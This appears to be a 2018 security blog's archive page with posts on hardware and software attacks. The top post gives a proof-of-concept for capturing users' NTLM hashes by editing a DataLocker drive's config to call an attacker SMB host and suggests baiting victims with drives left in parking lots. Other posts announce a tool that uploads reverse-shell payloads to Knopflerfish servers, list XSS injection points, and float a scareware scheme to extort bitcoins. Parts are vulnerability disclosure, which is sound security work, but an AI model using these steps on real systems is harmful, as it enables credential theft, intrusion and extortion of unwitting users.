Monday, September 17, 2018

Nabbing NTLM Hashes With DataLocker Sentry ONE Managed USB Drives

The DataLocker Sentry ONE Managed USB drive is a great, affordable, secure self encrypting device. It features AES256 full disk encryption with built in management software that includes a anti-malware scanner. It does how ever have at least one feature that if exploited can lead to the users NTLM hashes being sent to any address the attacker chooses.

I found that the DataLocker Simply Secure device management software can be used to send the current users NTLM hash to any remote server an attacker chooses with no interaction from the user and without the users knowledge. The user simply has to run the unlock software and input the correct password, which auto launches the management software, triggering a SMB call.


This vulnerability depends on an insider threat or malware. You could drop these in a parking lot and put the password in the cap on a small piece or paper or something. Because its password protected, people might be more likely to want to check it out.

PoC:
Set up SMB server to prompt for domain credentials on connect. (Metasploit: auxiliary/server/capture/smb)
Edit management software config to include path to SMB server as an app. (Drive Letter:\.Apps\.apps.db)
Add content after AdditionalApplications tag:
                < Appl>
                                < Identifier>0< /Identifier>
                                < AppPath>\\attack.machine\< /AppPath>
                                < Args></ Args>
                                < IconPath></ IconPath>
                                < DisplayName></ DisplayName>
                                < Summary></ Summary>
                                < Url></ Url>
                                < InternalVersion>0< /InternalVersion>
                                < OS>0</ OS>
                < /Appl>
"Remove spaces"
Close and relock device. Move to another computer or re-run unlock software.
Authenticate to device, triggering SMB request.
View Metasploit for NTLM hash.

Why they would allow this, or just didn't think of it when they were developing the software, I dont know.

0 comments

Labels: ,

Sunday, August 19, 2018

Knopflerf*ck tool - A Knopflerfish attack tool

Knopflerf*ck tool is a little script I made to attack the Knopflerfish Framework. It currently will scan a host for the presence of the Knopflerfish Framework and then run a quick enum of a few its services like http server and remote framework functionality, and a known XSS in its http console. It can also generate a reverse shell connection payload and upload/execute it if the remote framework is exposed.

KFT usage and "modes"
Mode 1 runs an enum scan
-Checks for default bundle info, HTTPConsole, and if the remote framework is running
-Usage: python knopflerfucktool.py 1
Mode 2 outputs a payload to upload however you like
-Usage: python knopflerfucktool.py 2
-This mode also makes the payload needed for mode 3
-Requires openJDK 1.8.0 and Eclipse Equinox (eceq.jar)
Mode 3 uses the KF Remote Framework to upload and run a payload
-Usage: python knopflerfucktool.py 3
-This mode needs the payload from mode 2
-The payload needs to be host on the web root of http://:/

Get it at GitHub

0 comments

Labels: ,

Tuesday, July 24, 2018

Knopflerfish bundle httpconsole 4.0.1 XSS

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Cross Site Scripting x2
[x] Vendor: Knopflerfish Project
[x] Vendor Website: https://www.knopflerfish.org
[x] Bundle Name: httpconsole
[x] Bundle Version: 4.0.1
[x] Bundle DL: https://www.knopflerfish.org/releases/current/osgi/jars/httpconsole/httpconsole_all-4.0.1.jar
[x] Found by: Anarchy Angel
[x] Twitter: @anarchyang31
[x] URL: https://aahideaway.blogspot.com
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[1] Pre-authentication XSS in login page.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: loginname

exp:
POST /servlet/console HTTP/1.1
Host: http://knopflerfish-server:8080
...

loginname=[XSS]&loginpwd=asd&login_cmd=Login
====


[2] Post authentication XSS in management console.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: cmd_install_url

exp:
POST /servlet/console HTTP/1.1
Host: http://knopflerfish-server:8080
...

bundle_id=29&cmd_install_url=[XSS]&cmd_installurl=install

Ummm firsties? :)

0 comments

Labels:

Saturday, June 2, 2018

Files for part 3 of 3 from Fully Functional & Programmed in Multiple Techniques

This time we covered broadcast receivers abuse in android applications.

Here is the android studio project

Slides from the demo

 Here is the cheatsheet I keep talking about :)

Many thanks to stl2600 and Arch Reactor for allowing me to do stuff in the space! I hope everyone enjoyed this small series of presentations.

Thank you all!

0 comments

Labels: ,

Saturday, May 5, 2018

Files for part 2 of 3 from Fully Functional & Programmed in Multiple Techniques

This time we covered content provider abuse in android applications.

Here is the android studio project

Slides from the demo

I hope everyone enjoyed this presentation.

Thank you.

0 comments

Labels: ,

Monday, April 16, 2018

Files for part 1 of 3 from Fully Functional & Programmed in Multiple Techniques

More info on series here - https://www.meetup.com/St-Louis-2600/events/skcdpnyxgbjb/


Source for the app HERE

Apps to inspect other apps AndroidManifest.xml file and manipulate activities:
Apk Analyzer by Martin Styk
Apk Analyzer by Dinostudio8891
Same name and some duplication, but one gives you a better view of the AndroidManifest.xml file (Martin), and the other gives you more control over the exposed elements (Dino). You can find them in the play store.

Sorry it took me so long to get this up...

0 comments

Labels: ,

Saturday, March 31, 2018

Three part series on android app pen-testing at stl2600/dc314 by me!

Come join me while I do a three part series on android app pen-testing at the next three stl2600/DC314 meetings! 

First session is setup and intent spoofing. (5/6/18)

Second is exploiting exported content providers and insecure file storage. (6/4/18)

Third is exploiting exported broadcast receivers. (7/1/18)

In each case we examine the source code of an app with the vuln and
and how to exploit. Then discuss the hallmarks on how to find them in other apps "grep dorks".

People can/should bring their own systems to play along! I hope to see you there!

 More info HERE

0 comments

Saturday, February 10, 2018

Advanced HaX11 Social Engineering Functionality

One of the features of HaX11 is the ability to open a full screen browser on the target machine to any URL you like. It is intended to be used in a social engineering attack on the target to attempt to get passwords or other sensitive information but you can use it for what ever you can imagine. Its easy to use, but does require you to have a web server running somewhere the target machine can access.

This attack also has a higher success rate as far as executing relative to the apps other functions on the target machine because rather then depending on the configuration of the target to share windows/desktops, you share a window to it!

Another thought I was playing around with was a type of ransomeware attack where you just keep popping the window until they give you bitcoins. The idea is the victim will have no idea whats really going on and might assume they really are infected with some of the ransomeware they see on TV. The scareware approach might work as well. Anyway that just a few ideas, but how you use it is really up to you. Enjoy.

0 comments

Subscribe to: Posts (Atom)